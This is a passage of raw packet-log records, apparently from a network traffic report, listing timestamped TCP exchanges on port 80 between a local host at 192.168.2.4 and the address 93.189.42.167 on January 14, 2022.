Jan 14, 2022 00:15:51.567550898 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567593098 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567631006 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567655087 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567670107 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567671061 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567708969 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567749977 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567790031 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567806005 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567832947 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567840099 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567873001 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567913055 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567930937 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567950964 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567991018 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568028927 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568051100 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568068981 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568083048 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568123102 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568162918 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568175077 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568203926 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568244934 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568258047 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568289042 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568330050 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568345070 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568372011 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568413019 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568428993 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568455935 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568495989 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568536997 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568552017 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568579912 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568583965 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568619013 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568659067 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568671942 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568698883 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568741083 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568780899 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568794012 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568819046 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568834066 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568859100 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568898916 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.568912983 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.568981886 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569031954 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569036961 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569073915 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569113016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569119930 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569154978 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569180012 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569207907 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569219112 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569264889 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569322109 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569375038 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569432020 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569469929 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569564104 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569633961 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569670916 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569672108 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569710016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569727898 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569749117 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569787025 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569801092 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569825888 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569905043 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569942951 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569962978 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.569983006 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.569986105 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570023060 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570066929 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570075989 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570107937 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570152998 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570167065 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570192099 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570230961 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570245028 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570271015 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570308924 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570349932 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570363998 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570389032 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570430040 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570447922 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570472002 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570486069 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570508957 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570559025 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570563078 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570599079 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570636034 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570652008 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570674896 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570713997 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570732117 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570753098 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570791960 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570813894 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570830107 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570868015 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570883036 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.570908070 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570945024 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570983887 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.570997953 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571022987 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571059942 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571077108 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571099043 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571136951 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571177006 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571196079 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571217060 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571224928 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571254969 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571270943 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571295023 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571333885 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571360111 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571371078 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571412086 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571456909 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571479082 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571496010 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571510077 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571527958 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571567059 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571583986 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571607113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571645021 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571655989 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571686029 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571727991 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571765900 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571782112 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571805000 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571818113 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571842909 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571882010 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571894884 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571921110 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571959019 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.571971893 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.571999073 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.572040081 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.572076082 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.572093010 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.572115898 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.572165966 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.622633934 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622684956 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622766972 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622781038 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.622807026 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622848034 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622869015 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.622885942 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622934103 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622975111 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.622988939 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623012066 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623051882 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623074055 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623090982 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623117924 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623127937 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623167992 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623214006 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623230934 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623244047 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623265028 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623291969 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623298883 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623339891 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623377085 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623377085 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623415947 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623416901 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623456001 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623481989 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623496056 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623536110 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623569012 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623575926 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623615026 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623646975 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623656034 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623693943 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623720884 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623732090 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623770952 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623811007 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623835087 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623851061 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623887062 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623887062 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623927116 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.623963118 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.623965979 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624002934 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624042988 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624063969 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624083996 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624115944 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624124050 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624164104 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624201059 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624221087 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624239922 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624275923 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624279022 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624316931 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624345064 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624356031 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624394894 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624434948 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624455929 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624474049 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624505043 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624511003 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624550104 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624589920 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624589920 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624629021 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624669075 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624690056 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624706984 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624739885 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624747992 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624788046 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624825001 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624856949 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624865055 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624901056 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.624903917 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.624964952 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625003099 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625044107 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625082016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625108004 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625121117 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625171900 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625186920 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625211000 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625250101 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625288963 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625298977 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625327110 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625368118 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625394106 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625403881 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625436068 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625442982 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625482082 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625530005 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625556946 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625570059 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625598907 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625607967 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625647068 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625686884 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625686884 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625724077 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625755072 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625763893 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625802040 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625832081 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625901937 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625905991 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625940084 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.625941992 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.625981092 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626015902 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.626020908 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626162052 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626180887 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.626229048 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626291037 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626307011 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.626355886 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626396894 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626435041 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626454115 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.626482964 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626503944 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.626537085 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626624107 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626641989 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.626677990 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626749992 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.626770020 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626828909 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626899958 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.626904011 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627002001 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627057076 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627096891 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627124071 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627139091 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627165079 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627180099 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627250910 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627296925 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627319098 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627365112 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627434015 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627480984 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627512932 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627562046 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627603054 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627652884 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627661943 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627729893 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627835989 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627892017 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627922058 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.627937078 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.627962112 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.628032923 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.628132105 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.628199100 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.628206015 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.628251076 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.628268003 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.628339052 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.628401041 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.628426075 CET	80	49873	93.189.42.167	192.168.2.4
